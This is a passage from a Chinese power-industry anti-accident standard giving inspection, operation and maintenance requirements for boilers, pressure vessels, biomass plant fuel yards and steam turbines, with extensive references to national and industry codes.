压部件在安装前必须进行安全性能检验,并将该项工作前移至制造厂,与设备监 造工作结合进行。在役锅炉结合机组检修开展承压部件、锅炉定期检验。锅炉检 验项目和程序按《中华人民共和国特种设备安全法》、《特种设备安全监察条例》 (国务院令第 549 号,2009 年修订版)、《锅炉安全技术规程》(TSG 11-2020)、 《电站锅炉压力容器检验规程》(DL647-2004)、《固定式压力容器安全技术 65 (TSG 21-2016)和《火力发电厂金属技术监督规程》 监察规程》 (DL/T 438-2016) 等相关规定进行。 6.5.5 防止超压超温的重点要求 (1) 严防锅炉缺水和超温超压运行,严禁在水位表数量不足(指能正确指 示水位的水位表数量)、安全阀解列的状况下运行。 (2) 参加电网调峰的锅炉,运行规程中应制定相应的技术措施。按调峰设 计的锅炉,其调峰性能应与汽轮机性能相匹配;非调峰设计的锅炉,其调峰负荷 的下限应由水动力计算、水动力试验及燃烧稳定性试验确定,并在运行规程制定 相应的反事故措施。 (3) 直流锅炉的蒸发段、分离器、过热器、再热器出口导汽管等应有完整 的管壁温度测点,以便监视各导汽管间的温度,并结合直流锅炉蒸发受热面的水 动力分配特性,做好直流锅炉燃烧调整工作,防止超温爆管。 (4) 锅炉超压水压试验和安全阀整定应严格按《电力行业锅炉压力容器安 全监督规程》(DL/T 612-2017)、《电站锅炉压力容器检验规程》(DL/T 647-2004)、《电站锅炉安全阀技术规程》(DL/T 959-2020)执行。 (5)装有一、二级或多级旁路系统的机组,机组起停时应投入旁路系统, 旁路系统的减温水须正常可靠。 (6) 锅炉启停过程中,应严格控制汽温变化速率。在启动中应加强燃烧调 整,防止炉膛出口烟温超过规定值。 (7) 加强直流锅炉的运行调整,严格按照规程规定的负荷点进行干湿态转 换操作。 (8)锅炉承压部件使用的材料应符合《高压锅炉用无缝钢管》 (GB/T5310-2017)和《火力发电厂金属材料选用导则》(DL/T 715-2015)的 规定,材料的允许使用温度应高于计算壁温并留有裕度。应配置必要的炉膛出口 或高温受热面两侧烟气温度测点、高温受热面壁温测点,应加强对烟气温度偏差 和受热面壁温的监视和调整。现有壁温测点无法满足需要时,及时增加超温管段 的壁温测点。 6.5.6 防止设备大面积腐蚀的重点要求 (1)严格执行《火力发电机组及蒸汽动力设备水汽质量》 66 (GB/T12145-2016)、《化学监督导则》(DL/T 246-2015)、《火力发电厂水 汽化学监督导则》(DL/T 561-2022)、《电力基本建设热力设备化学监督导则》 (DL/T 889-2015)、 (DL/T 712-2021)、 《发电厂凝汽器及辅机冷却器管选材导则》 《火力发电厂停(备)用热力设备防锈蚀导则》(DL/T 956-2017)、《火力发 电厂锅炉化学清洗导则》(DL/T 794-2012)、《火电厂凝汽器管防腐防垢导则》 (DL/T 300-2022)等有关规定,加强化学监督工作。 (2)机组运行时凝结水精处理设备严禁全部退出。机组启动时应及时投入 凝结水精处理设备,直流锅炉机组在启动冲洗达到规程规定铁、硅等指标时即应 投入精处理设备,精处理运行设备应采取氢型运行方式防止漏氯漏钠,以保证精 处理出水质量。 (3)凝结水精处理系统再生时要保证阴阳离子交换树脂的分离度和再生度, 防止再生过程发生交叉污染,阴树脂的再生剂应满足《工业用氢氧化钠》(GB/T 209-2018)中离子膜碱一等品要求,阳树脂的再生剂应满足《工业用合成盐酸》 (GB 320-2006)中优等品的要求。精处理树脂投运前应充分正洗,应控制阴树脂 正洗出水电导率小于 1μS/cm、阳树脂正洗出水电导率小于 2μS/cm、混合树脂 正洗出水电导率小于 0.1μS/cm;串联阳床+阴床系统,控制阴、阳树脂在再生 设备中单独正洗至电导率小于 1μS/cm,投运前设备串联正洗至末级出水电导率 小于 0.1μS/cm,防止树脂中的残留再生酸液被带入水汽系统而造成炉水 pH 值 大幅降低。 (4) 应定期检查凝结水精处理混床和树脂捕捉器的完好性,防止凝结水精 处理混床树脂在运行过程中漏入热力系统,其分解产物影响水汽品质,造成热力 设备腐蚀。 (5) 加强循环冷却水处理系统的监督和管理,严格按照动态模拟试验结果 控制循环水的各项指标,防止凝汽器管材腐蚀、结垢及泄漏。当凝结器管材发生 泄漏造成凝结水品质超标时,应及时查漏、堵漏。 (6)当运行机组发生水汽质量劣化时,严格按《火力发电机组及蒸汽动力 设备水汽质量》(GB/T 12145-2016)中的第 15 条、《火力发电厂水汽化学监督 导则》(DL/T 561-2013)中的第 6 条、《火电厂汽水化学导则 第 4 部分:锅炉 给水处理》(DL/T 805.4-2016)中的第 9 条处理,严格执行“三级处理”制度。 67 (7) 按照《火力发电厂停(备)热力设备防锈蚀导则》(DL/T 956-2017) 进行机组停用保护,防止锅炉、汽轮机、凝汽器(包括空冷岛)、热网换热器等 热力设备发生停用腐蚀。 (8)应按《发电厂凝汽器及辅机冷却器管选材导则》(DL/T 712-2021)的 规定选用凝汽器及辅机冷却器管材,安装或更新前应进行严格的质量检验和验 收,并加强运行维护及检修检查评价。 (9) 加强锅炉燃烧调整,改善贴壁气氛,避免高温腐蚀。锅炉改燃非设计 煤种时,应全面分析新煤种高温腐蚀特性,采取有针对性的措施。锅炉采用主燃 区过量空气系数低于 1.0 的低氮燃烧技术时应加强贴壁气氛监视和大小修时对锅 炉水冷壁管壁高温腐蚀趋势的检查工作。 (10)在大修或大修前的最后一次检修时应割取水冷壁管并测定垢量,按《火 力发电厂锅炉化学清洗导则》(DL/T 794-2012)相关规定及时进行机组化学清洗。 (11) 热网疏水等各类温度较高的工质禁止直接进入给水系统,应降温后 接入凝汽器,并经精处理设备处理后进入给水系统,以免造成给水水质劣化。 6.5.7 防止炉外管爆破的重点要求 (1) 加强炉外管巡视,对管系振动、水击、膨胀受阻、保温脱落等现象应 认真分析原因,及时采取措施。炉外管发生漏汽、漏水现象,必须尽快查明原因 并及时采取措施,如不能与系统隔离处理应立即停炉。 (2) 按照《火力发电厂金属技术监督规程》(DL/T 438-2016),对汽包、 直流锅炉汽水分离器及储水罐、集中下降管、联箱、主蒸汽管道、再热蒸汽管道、 弯管、弯头、阀门、三通等大口径部件及其焊缝进行检查,及时发现和消除设备 缺陷。对于不能及时处理的缺陷,应对缺陷尺寸进行定量检测及监督,并做好相 应技术措施。 (3) 定期对导汽管、汽水联络管、下降管等炉外管以及联箱封头、接管座 等进行外观检查、壁厚测量、圆度测量及无损检测,发现裂纹、冲刷减薄或圆度 异常复圆等问题应及时采取打磨、补焊、更换等处理措施。 (4) 加强对汽水系统中的高中压疏水、排污、减温水等小径管的管座焊缝、 内壁冲刷和外表腐蚀现象的检查,发现问题及时更换。 (DL/T 616-2006) (5) 按照《火力发电厂汽水管道与支吊架维修调整导则》 68 的要求,对支吊架进行定期检查和调整。 (6) 对于疏水管道、放空气管等存在汽水两相流的管道,应重点检查其与 母管相连的角焊缝、母管开孔的内孔周围、弯头等部位的裂纹和冲刷,其管道、 弯头、三通和阀门,运行 10 万小时后,宜结合检修全部更换。 (7)定期对喷水减温器检查,混合式减温器每隔 1.5~3 万小时检查一次, 应采用内窥镜进行内部检查,喷头应无脱落、喷管无开裂、喷孔无扩大,联箱内 衬套应无裂纹、腐蚀和断裂。减温器内衬套长度小于 8 米时,除工艺要求的必须 焊缝外,不宜增加拼接焊缝;若必须采用拼接时,焊缝应经 100%探伤合格后方 可使用。防止减温器喷头及套筒断裂造成过热器联箱裂纹,面式减温器运行 2~3 万小时后应抽芯检查管板变形,内壁裂纹、腐蚀情况及芯管水压检查泄漏情况, 以后每大修检查一次。 (8) 在检修中,应重点检查可能因膨胀和机械原因引起的承压部件爆漏的 缺陷。 (9) 机组投运的第一年内,应对主蒸汽和再热蒸汽管道的不锈钢温度套管 角焊缝进行渗透和超声波检测,并结合每次 A 级检修进行检测。 (10) 锅炉水压试验结束后,应严格控制泄压速度,并将炉外蒸汽管道存 水完全放净,防止发生水击。 (11) 焊接工艺、质量、热处理及焊接检验应符合《火力发电厂焊接技术 规程》(DL/T 869-2021)和《火力发电厂焊接热处理技术规程》(DL/T 819-2019) 的有关规定。 6.5.8 防止锅炉四管爆漏的重点要求 (1) 建立锅炉承压部件防磨防爆设备台帐,制定和落实防磨防爆定期检查 计划、防磨防爆预案,完善防磨防爆检查、考核制度。 (2) 在有条件的情况下,应采用漏泄监测装置。水冷壁、过热器、再热器、 省煤器管发生爆漏时,应及时停运,防止扩大冲刷损坏其它管段。 (3) 定期检查水冷壁刚性梁四角连接及燃烧器悬吊机构,发现问题及时处 理。防止因水冷壁晃动或燃烧器与水冷壁鳍片处焊缝受力过载拉裂而造成水冷壁 泄漏。 (4)加强蒸汽吹灰设备系统的维护及管理。在蒸汽吹灰系统投入正式运行 69 前,应对各吹灰器蒸汽喷嘴伸入炉膛内的实际位置及角度进行测量、调整,并对 吹灰器的吹灰压力进行逐个整定,避免吹灰压力过高。吹灰器投用前应对吹灰管 路充分暖管疏水,严禁吹灰蒸汽带水。运行中遇有吹灰器卡涩、进汽门关闭不严 等问题,应及时将吹灰器退出并关闭进汽门,避免受热面被吹损,并通知检修人 员处理。 (5) 锅炉发生四管爆漏后,必须尽快停炉。在对锅炉运行数据和爆口位置、 数量、宏观形貌、内外壁情况等信息作全面记录后方可进行割管和检修。应对爆 漏原因进行分析,分析手段包括宏观分析、金相组织分析和力学性能试验,必要 时对结垢和腐蚀产物进行化学成分分析,根据分析结果采取相应措施。 (6) 运行时间接近设计寿命或发生频繁泄漏的锅炉过热器、再热器、省煤 器,应对受热面管进行寿命评估,并根据评估结果及时安排更换。 (7) 达到设计使用年限的机组和设备,必须按规定对主设备特别是承压管 路进行全面检查和试验,组织专家进行全面安全性评估,经主管部门审批后,方 可继续投入使用。 (8) 对新更换的金属钢管必须进行光谱复核,焊缝 100%探伤检查,并按 《火力发电厂焊接技术规程》(DL/T 869-2021)和《火力发电厂焊接热处理技 术规程》(DL/T 819-2019)要求进行热处理。 (9)加强锅炉水冷壁及集箱检查,以防止裂纹导致泄漏。 6.5.9 防止超(超超)临界锅炉高温受热面管内氧化皮大面积脱落 (1) 超(超超)临界锅炉受热面设计必须尽可能减少热偏差,各段受热面 必须布置足够的壁温测点,测点应定期检查校验,确保壁温测点的准确性。 (2) 高温受热面管材的选取应考虑合理的高温抗氧化裕度。 (3) 加强锅炉受热面和联箱监造、安装阶段的监督检查,必须确保用材正 确,受热面内部清洁,无杂物。重点检查原材料质量证明书、入厂复检报告和进 口材料的商检报告。 (4) 必须准确掌握各受热面多种材料拼接情况,合理制定壁温报警定值。 (5) 必须重视试运中酸洗、吹管工艺质量,吹管完成过热器高温受热面联 箱和节流孔必须进行内部检查、清理工作,确保联箱及节流圈前清洁无异物。 (6) 不论是机组启动过程,还是运行中,都必须建立严格的超温管理制度, 70 认真落实,严格执行规程,杜绝超温。 (7) 严格执行厂家设计的启动、停止方式和变负荷、变温速率。 (8) 机组运行中,尽可能通过燃烧调整,结合平稳使用减温水和吹灰,减 少烟温、汽温和受热面壁温偏差,保证各段受热面吸热正常,防止超温和温度突 变。 (9) 对于存在氧化皮问题的锅炉,不应停炉后强制通风快冷。 (10) 加强汽水监督,给水品质达到《火力发电机组及蒸汽动力设备水汽 质量》(GB/T 12145-2016)。 (11)新投产的超(超超)临界锅炉,必须在第一次检修时进行高温段受热 面的管内氧化情况检查。对于存在氧化皮问题的锅炉,必须利用检修机会对弯头 及水平段进行氧化层检查,以及氧化皮分布和运行中壁温指示对应性检查。 (12) 加强对超(超超)临界机组锅炉过热器的高温段联箱、管排下部弯 管和节流圈的检查,以防止由于异物和氧化皮脱落造成的堵管爆破事故。对弯曲 半径较小的弯管应进行重点检查。 (13) 加强新型高合金材质管道和锅炉蒸汽连接管的使用过程中的监督检 验,每次检修均应对焊口、弯头、三通、阀门等进行抽查,尤其应注重对焊接接 头中危害性缺陷(如裂纹、未熔合等)的检查和处理,不允许存在超标缺陷的设 备投入运行,以防止泄漏事故;对于记录缺陷也应加强监督,掌握缺陷在运行过 程中的变化规律及发展趋势,对可能造成的隐患提前做出预判。 (14) 加强新型高合金材质管道和锅炉蒸汽连接管运行过程中材质变化规 律的分析,定期对 P91、P92、P122 等材质的管道和管件进行硬度和微观金相组 织定点跟踪抽查,积累试验数据并与国内外相关的研究成果进行对比,掌握材质 老化的规律,一旦发现材质劣化严重应及时进行更换。对于应用于高温蒸汽管道 的 P91、P92、P122 等材质的管道,如果发现硬度低于标准值,应及时分析原因, 进行金相组织检验,必要时,进行强度计算与寿命评估,并根据评估结果采取相 应措施。焊缝硬度超出控制范围,首先在原测点附近两处和原测点 180°位置再 次测量;其次在原测点可适当打磨较深位置,打磨后的管子壁厚不应小于管子的 最小计算壁厚。 6.5.10 奥氏体不锈钢小管监督的重点要求 71 (1) 奥氏体不锈钢管子蠕变应变大于 4.5%,T91、T122 类管子外径蠕变 应变大于 1.2%,应进行更换。 (2) 对于奥氏体不锈钢管子要结合大修检查钢管及焊缝是否存在沿晶、穿 晶裂纹,一旦发现应及时换管。 (3) 锅炉运行 5 万小时后,检修时应对与奥氏体耐热钢相连的异种钢焊缝 按 10%进行无损检测。 (4) 对于奥氏体不锈钢管与铁素体钢管的异种钢接头在 5 万小时进行割管 检查,重点检查铁素体钢一侧的熔合线是否开裂。 6.6 防止农林生物质发电事故 6.6.1 防止农林生物质电厂燃料存储区、上料皮带及炉前料仓着火的重点要 求 (1)应做好料场整体规划,预防外来火源、火灾,防火间距满足相关规程 要求;堆垛位置选择排水比较好的区域,确保雨水可以及时排出;消防通道保持 通畅。 (2)规范燃料存储区的用电设备,严格用电安全。加强料场内用电管理, 杜绝雷电火灾。 (3)上料系统及炉前料仓必须采取防火措施,设置消防水喷淋系统,杜绝 外来火源,并在炉前料仓与皮带之间设置防火挡板。螺旋给料机头部宜装有感温 探测器,当温度异常时,应能向控制室报警。 (4)加强料场内部消防安全管理,从严控制火灾隐患。严格料场门禁管理, 对入厂车辆和人员进行检查登记,设立火种留置柜,进入料场必须留下火种。 (5)加强车辆安全管理,杜绝车辆自燃火灾。 (6)料场内严禁吸烟;料场内岗楼、值班室、计量室应采用无明火方式取 暖,禁止使用大功率电热取暖设备(如电炉、热得快、小太阳等),料场内燃料 卸车过程中,必须严格检查卸料现场是否有遗留火种,卸车完成后应检查卸车现 场,及时清理散落燃料,确保安全。 6.6.2 防止水冷壁和高温受热面高温腐蚀的重点要求 (1)在锅炉设计时,必须合理控制炉膛温度;必须采用合适的材料与合理 的受热面结构,以避免结渣造成的碱金属和氯离子腐蚀。 72 (2)锅炉设计方案中应充分考虑优化锅炉蒸汽流程和烟气流程,考虑对炉 膛拱形结构和向火侧水冷壁的材质进行升级优化,做好防止高温腐蚀措施。 (3)加强入厂燃料和入炉燃料的管理工作,严格控制入炉燃料质量,主要 控制燃料氯含量、钠含量和硫含量不超锅炉设计燃料范围要求。 (4)禁止掺烧、改烧煤等高污染燃料,以及垃圾、塑料等废弃物。 (5)应在每次停炉检修时对水冷壁、高温过热器等向火侧开展高温腐蚀检 查,做好记录形成台账,并根据历史记录和台账判断管子强度,必要时采取喷涂 等措施加强或者更换管子。 6.6.3 防止锅炉尾部再次燃烧的重点要求 (1)在炉膛出口烟道转向部位应设置分离灰斗,并应及时清除沉积分离下 来的大颗粒及未燃尽火星,减少逃逸出锅炉的未燃尽大颗粒及火星。 (2)必须在锅炉烟气出口设置火花捕集器或者旋风除尘器,运行中预分离 大颗粒及未燃尽火星,避免火星直接撞击布袋。 (3)除尘系统设计时应选择防火材质的除尘器滤袋。 (4)应定期清理除尘器底部灰斗积灰,防止发生再次燃烧烧损滤袋。 7 防止压力容器等承压设备爆破事故的重点要求 7.1 防止承压设备超压事故 7.1.1 根据设备特点和系统的实际情况,制定每台压力容器的操作规程。操 作规程中应明确异常工况的紧急处理方法,确保在任何工况下压力容器不超压、 超温运行。 7.1.2 各种压力容器安全阀应定期进行校验。 7.1.3 运行中的压力容器及其安全附件(如安全阀、排污阀、监视表计、连 锁、自动装置等)应处于正常工作状态。设有自动调整和保护装置的压力容器, 其保护装置的退出应经单位技术总负责人批准,保护装置退出后,实行远控操作 并加强监视,且应限期恢复。 7.1.4 除氧器的运行操作规程应符合《电站压力式除氧器安全技术规定》 (能 源安保〔1991〕709号)的要求。除氧器两段抽汽之间的切换点,应根据《电站 压力式除氧器安全技术规定》进行核算后在运行规程中明确规定,并在运行中严 73 格执行,严禁高压汽源直接进入除氧器。 7.1.5 使用中的各种气瓶严禁改变涂色,严防错装、错用;气瓶立放时应采 取防止倾倒的措施;液氯钢瓶必须水平放置;放置液氯、液氨钢瓶、溶解乙炔气 瓶场所的温度要符合要求。使用溶解乙炔气瓶者必须配置防止回火装置。 7.1.6 压力容器内部有压力时,严禁进行任何修理或紧固工作。 7.1.7 压力容器上使用的压力表,应列为计量强制检定表计,按规定周期进 行强检。 7.1.8 压力容器的耐压试验应参考《固定式压力容器安全技术监察规程》 (TSG 21-2016)进行。 7.1.9 检查进入除氧器、扩容器的汽源压力,应采取措施消除除氧器、扩容 器超压的可能。应采取滑压运行,取消二段抽汽进入除氧器。 7.1.10 单元制的给水系统,除氧器上应配备不少于两只全启式安全门,并完 善除氧器的自动调压和报警装置。 7.1.11 除氧器和其他压力容器安全阀的总排放能力,应能满足其在最大进汽 工况下不超压。 7.1.12 高压加热器等换热容器,应防止因水侧换热管泄漏导致的汽侧容器筒 体的冲刷减薄。定期检验时应增加对水位附近的筒体减薄的检查内容。 7.1.13 氧气瓶、乙炔气瓶等气瓶在户外使用必须竖直放置并固定,不得放置 阳光下暴晒,必须放在阴凉处。 7.1.14 氧气瓶、乙炔气瓶等气瓶不得混放,不得在一起搬运。 7.2 防止氢罐等压力容器爆炸事故 7.2.1 制氢站应采用性能可靠的压力调整器,并加装液位差越限联锁保护装 置和氢侧氢气纯度表、在线氢中氧量、在线氧中氢量监测仪表,防止制氢设备系 统爆炸。 7.2.2 对制氢系统及氢罐的检修应进行可靠的隔离。 7.2.3 氢罐应按照《固定式压力容器安全技术监察规程》(TSG 21-2016)的 要求进行定期检验。 7.2.4 运行10年及以上的氢罐,应该重点检查氢罐的外形,尤其是上下封头 不应出现鼓包和变形现象。 74 7.2.5 压力容器工作介质为易燃易爆气体的,应根据设计要求,在维护和检 验中安排泄漏试验。 7.3 防止压力容器脱检漏检 7.3.1 火电厂热力系统压力容器定期检验时,应按照《电站锅炉压力容器检 验规程》(DL647-2004)要求,对与压力容器相连的管系进行检查,特别是对 蒸汽进口附近的内表面热疲劳和加热器疏水管段冲刷、腐蚀情况的检查。防止爆 破汽水喷出伤人。 7.3.2 禁止在压力容器上随意开孔和焊接其他构件。若涉及在压力容器筒壁 上开孔或修理等修理改造时,应按照《固定式压力容器安全技术监察规程》 (TSG 21-2016)第5.2条“改造与重大修理”进行。 7.3.3 停用超过一年以上的压力容器重新启用时,应当进行自行检查。超过 定期检验有效期的,应当按照定期检验的有关要求进行检验。 7.3.4 在订购压力容器前,应对设计单位和制造厂商的资格进行审核,其供 货产品必须附有“压力容器产品质量证明书”和制造厂所在地锅炉压力容器监检 机构签发的“监检证书”。要加强对所购容器的质量验收,特别应参加容器水压试 验等重要项目的验收见证。 7.4 防止压力容器违规使用 7.4.1 压力容器投入使用必须按照《特种设备使用管理规则》 (TSG 08-2017) 办理使用登记手续,申领使用登记证。未进行建设期检验、办理使用登记手续的 压力容器,严禁投入运行使用。 7.4.2 对已经投入运行的压力容器中设计资料不全、材质不明及经检验安全 性能不良的老旧容器,应安排计划进行更换。 7.4.3 使用单位对压力容器的管理,不仅要满足特种设备的法律法规技术性 条款的要求,还要满足有关特种设备在法律法规程序上的要求。定期检验有效期 届满1个月以前,应向压力容器检验机构提出定期检验要求。 7.4.4 达到设计使用年限(未规定设计使用年限但使用超过 20 年)的压力 容器,应安排计划进行更换。如确需继续使用,应当依据《特种设备使用管理规 则》(TSG 08-2017)和《固定式压力容器安全技术监察规程》(TSG 21-2016) 要求,在到期时进行检验或安全评估,办理使用登记变更。 75 7.4.5 使用单位应参照固定式压力容器做好简单压力容器使用安全管理,达 到使用年限时应当报废。 8 防止汽轮机、燃气轮机事故的重点要求 8.1 防止汽轮机超速事故 8.1.1 在额定蒸汽参数下,调节系统应能维持汽轮机在额定转速下稳定运行, 甩负荷后能将机组转速控制在超速保护动作值转速以下。 8.1.2 数字式电液控制系统(DEH)应设有完善的机组启动与保护逻辑和严 格的限制启动条件;对机械液压调节系统的机组,也应有明确的限制启动条件。 8.1.3 汽轮发电机组轴系应至少安装两套转速监测装置在不同的转子上。两 套装置转速值相差超过30r/min后分散控制系统(DCS)应发报警。技术人员应 分析原因,确认转速测量系统故障时,应立即处理。 8.1.4 抽汽供热机组的抽汽逆止阀关闭应迅速、严密,联锁动作应可靠,布 置应靠近抽汽口,并必须设置有能快速关闭的抽汽关断阀,以防止抽汽倒流引起 超速。 8.1.5 透平油和抗燃油的油质应合格。油质不合格的情况下,严禁机组启动。 8.1.6 各种超速保护均应正常投入。超速保护不能可靠动作时,禁止机组运 行(超速试验所必要的启动、并网运行除外)。 8.1.7 机组重要运行监视表计,尤其是转速表,显示不正确或失效,严禁机 组启动。运行中的机组,在无任何有效监视手段的情况下,必须停止运行。 8.1.8 新建或机组大修后,必须按规程要求进行汽轮机调节系统静止试验或 仿真试验,确认调节系统工作正常。在调节部套有卡涩、调节系统工作不正常的 情况下,严禁机组启动。 8.1.9 在任何情况下绝不可强行挂闸。 8.1.10 机组正常启动或停机过程中,应严格按运行规程要求投入汽轮机旁路 系统,尤其是低压旁路。在机组甩负荷或事故状态下,应开启旁路系统。机组再 次启动时,再热蒸汽压力不得大于制造商规定的压力值。 8.1.11 坚持按规程要求进行主汽阀、调节汽阀、低压补汽阀关闭时间测试, 汽阀严密性试验,超速保护试验,阀门活动试验。 76 8.1.12 坚持按规程要求进行抽汽逆止阀关闭时间测试、机组运行中逆止阀活 动试验,逆止阀应动作灵活、不卡涩。 8.1.13 危急保安器动作转速一般为额定转速的110%±1%。 8.1.14 进行超速试验实际升速时,在满足试验条件下,主蒸汽和再热蒸汽压 力尽量取低值。 8.1.15 对新投产机组或汽轮机调节系统经重大改造后的机组,应进行甩负荷 试验。《火力发电建设工程机组甩负荷试验导则》(DL/T 1270)所列不宜进 行甩负荷试验的机组除外,包括: (1)未设置旁路系统。 (2)仅设置5%串级启动疏水系统。 (3)配置不具备热备用功能的启动旁路系统。 8.1.16 机组正常停机时,严禁带负荷解列。应先将发电机有功、无功功率减 至零,检查确认有功功率到零,电能表停转或逆转以后,再将发电机与系统解列; 或采用汽轮机手动打闸或锅炉手动主燃料跳闸联跳汽轮机,发电机逆功率保护动 作解列。 8.1.17 电液伺服阀(包括各类型电液转换器)的性能必须符合要求,否则不 得投入运行。油系统冲洗时,电液伺服阀必须按规定使用专用盖板替代,不合格 的油严禁进入电液伺服阀。运行中要严密监视其运行状态,不卡涩、不泄漏和动 作稳定。大修中要进行清洗、检测等维护工作。发现问题应及时处理或更换。备 用伺服阀应按制造商的要求条件妥善保管。 8.1.18 主油泵轴与汽轮机主轴间具有齿型联轴器或类似联轴器的机组,应定 期检查联轴器的润滑和磨损情况,其两轴中心标高、左右偏差应严格按制造商的 规定安装。 8.1.19 汽轮机在深调峰运行方式下,进入中压调节阀动作区间后,调节系统 应设置中压调节阀阀位限制或增加蓄能器等防止控制油压大幅摆动的措施。 8.2 防止汽轮机轴系断裂及损坏事故 8.2.1 机组主、辅设备的保护装置必须正常投入,已有振动监测保护装置的 机组,振动超限跳机保护应投入运行;机组正常运行瓦振、轴振应满足相关标准, 并注意监视变化趋势。 77 8.2.2 新机组投产前、已投产机组每次大修中,应进行转子表面和中心孔探 伤检查。按《火力发电厂金属技术监督规程》(DL/T 438)相关规定,对高温段 应力集中部位应进行表面检验,有疑问时进行表面探伤。选取不影响转子安全的 部位进行硬度检验,若硬度相对前次检验有较明显变化时应进行金相组织检验。 8.2.3 新机组投产前和机组大修中,必须检查平衡块固定螺栓、风扇叶片固 定螺栓、定子铁芯支架螺栓、各轴承和轴承座螺栓的紧固情况,保证各联轴器螺 栓的紧固和配合间隙完好,并有完善的防松措施。 8.2.4 新机组投产前应对焊接隔板的主焊缝进行检查。大修中应检查隔板变 形情况,最大变形量不得超过轴向间隙的三分之一。对于600MW以上机组或超 临界及以上机组,高中压隔板累计变形超过1mm,按《火力发电厂金属技术监督 规程》(DL/T 438)相关规定,应对静叶与外环的焊接部位进行相控阵检查, 结构条件允许时静叶与内环的焊接部位也应进行相控阵检查。 8.2.5 为防止由于发电机非同期并网造成的汽轮机轴系断裂及损坏事故,应 严格落实10.10.1条规定的各项措施。 8.2.6 严格按超速试验规程的要求,机组冷态启动带10%~25%额定负荷、运 行3~4h(或按制造商要求),解列后立即进行超速试验。 8.2.7 加强汽水品质的监督和管理。大修时应检查汽轮机转子叶片、隔板上 沉积物,并取样分析,针对分析结果制定有效的防范措施,防止转子及叶片表面 及间隙积盐、腐蚀。 8.2.8 对于送出线路加装串联补偿装置的机组,应采取措施预防因次同步谐 振造成发电机组转子损伤。 8.2.9 运行100000h以上的机组,每隔3~5年应对转子进行一次检查(制造商 有返厂检查等特殊要求的,可参照制造商要求执行)。运行时间超过15年、转子 寿命超过设计使用寿命、低压焊接转子、承担调峰启停频繁或深度调峰运行的转 子,应适当缩短检查周期。重点对高中压转子调速级叶轮根部的变截面R处和前 汽封槽,叶轮、轮缘小角及叶轮平衡孔部位,以及高、中、低压转子套装叶轮键 槽,焊接转子焊缝等部位进行检查。 8.2.10 严禁使用不合格的转子。已经过本企业上级单位主管部门批准并拟投 入运行的有缺陷转子应进行技术评定,根据机组的具体情况、缺陷性质制定运行 78 安全措施,并报主管部门审批后执行。 8.2.11 建立机组试验档案,包括投产前的安装调试试验、大小修后的调整试 验、常规试验和定期试验。 8.2.12 建立机组事故档案,无论大小事故均应建立档案,包括事故名称、性 质、原因和防范措施。 8.2.13 建立转子技术档案,包括制造商提供的转子原始缺陷和材料特性等转 子原始资料;历次转子检修检查资料;机组主要运行数据、运行累计时间、主要 运行方式、冷热态启停次数、启停过程中的汽温汽压负荷变化率、超温超压运行 累计时间、主要事故情况及原因和处理。 8.3 防止汽轮机大轴弯曲事故 8.3.1 疏水系统应保证疏水畅通。疏水联箱的标高应高于凝汽器热水井最高 点标高。高、低压疏水联箱应分开,疏水管应按压力顺序接入联箱,并向低压侧 倾斜45°。疏水联箱或扩容器应保证在各疏水阀全开的情况下,其内部压力仍低 于各疏水管内的最低压力。再热冷段蒸汽管的最低点应设有疏水点。防腐蚀汽管 直径应不小于76mm。 8.3.2 减温水管路阀门应关闭严密,自动装置可靠,并应设有截止阀。 8.3.3 轴封及门杆漏汽至除氧器或抽汽管路,应设置逆止阀和截止阀。 8.3.4 高、低压加热器应装设紧急疏水阀,可远方操作和根据疏水水位自动 开启。 8.3.5 高、低压轴封应分别供汽。特别注意高压轴封段或合缸机组的高中压 轴封段,其供汽管路应有良好的疏水措施。低压轴封供汽温度测点应与喷水装置 保持充分距离以避免温度测量不准,定期检查喷水减温装置的雾化效果,防止水 进入低压轴封。 8.3.6 凝汽器应设计有高水位报警并在停机后仍能正常投入。除氧器应有水 位报警和高水位自动放水装置。 8.3.7 汽轮机启动前必须符合以下条件,否则禁止启动: (1)大轴晃动(偏心)、串轴(轴向位移)、胀差、低油压和振动保护等 表计显示正确,并正常投入。 (2)大轴晃动值不超过制造商的规定值或原始值的±0.02mm。 79 (3)高压外缸上、下缸温差不超过50℃,高压内缸上、下缸温差不超过35℃。 若制造厂有更严格的规定,应从严执行。 (4)启动蒸汽参数应符合制造厂规定。一般情况下主汽阀前蒸汽温度应高 于汽缸最高金属温度50℃,但不超过额定蒸汽温度,且蒸汽过热度不低于50℃。 8.3.8 机组启、停过程操作措施: (1)机组启动前连续盘车时间应执行制造商的有关规定,至少不得少于 2~4h,热态启动不少于4h。若盘车中断应重新计时。 (2)机组启动过程中因振动异常停机必须回到盘车状态,应全面检查、认 真分析、查明原因。当机组已符合启动条件时,连续盘车不少于4h才能再次启动, 严禁盲目启动。 (3)机组热态启动前应检查停机记录,并与正常停机曲线进行比校,若有 异常应认真分析,查明原因,采取措施及时处理。 (4)机组热态启动投轴封供汽时,应确认盘车装置运行正常,先向轴封供 汽,后抽真空。停机后,凝汽器真空到零,方可停止轴封供汽。轴封供汽停止后, 应关闭轴封减温水截止阀。应根据缸温选择供汽汽源,以使供汽温度与金属温度 相匹配。 (5)疏水系统投入时,严格控制疏水系统各容器水位,注意保持凝汽器(排 汽装置)水位低于疏水联箱标高。供汽管道应充分暖管、疏水,严防水或冷汽进 入汽轮机。 (6)机组启动时从锅炉点火至机组并网带极低负荷运行期间,不得投入再 热蒸汽减温器喷水。机组深度调峰运行必须投入再热蒸汽减温器喷水时,应加强 对再热蒸汽温度监视。在锅炉熄火或机组甩负荷时,应及时切断主蒸汽、再热蒸 汽减温水。 (7)电动盘车在转子惰走到零后应立即投入。当盘车电流较正常值大、摆 动或有异音时,应查明原因及时处理。当汽缸内动静部分摩擦严重时,将转子高 点置于最高位置,关闭与汽缸相连通的所有疏水(闷缸措施),以保持上下缸温 差,监视转子弯曲度,当确认转子弯曲度正常后,进行试投盘车,盘车投入后应 连续盘车。当盘车盘不动时,严禁用起重机等设备强行盘车。 (8)停机后因盘车装置故障或其他原因需要暂时停止盘车时,应采取闷缸 80 措施,监视上下缸温差、转子弯曲度的变化,待盘车装置正常或暂停盘车的因素 消除后及时投入连续盘车。 (9)停机后应监视凝汽器(排汽装置)、高低压加热器、除氧器水位和主 蒸汽、再热冷段及再热热段管道集水罐处及各段抽汽管道管壁温度变化,防止汽 轮机进水。 8.3.9 汽轮机发生下列情况之一,应立即打闸停机: (1)机组启动过程中,在中速暖机之前,轴承振动超过0.03mm;或严格按 照制造商标准执行。 (2)机组启动过程中,通过临界转速时,轴承振动超过0.1mm或相对轴振 动值超过0.25mm,应立即打闸停机;或严格按照制造商的标准执行;严禁强行 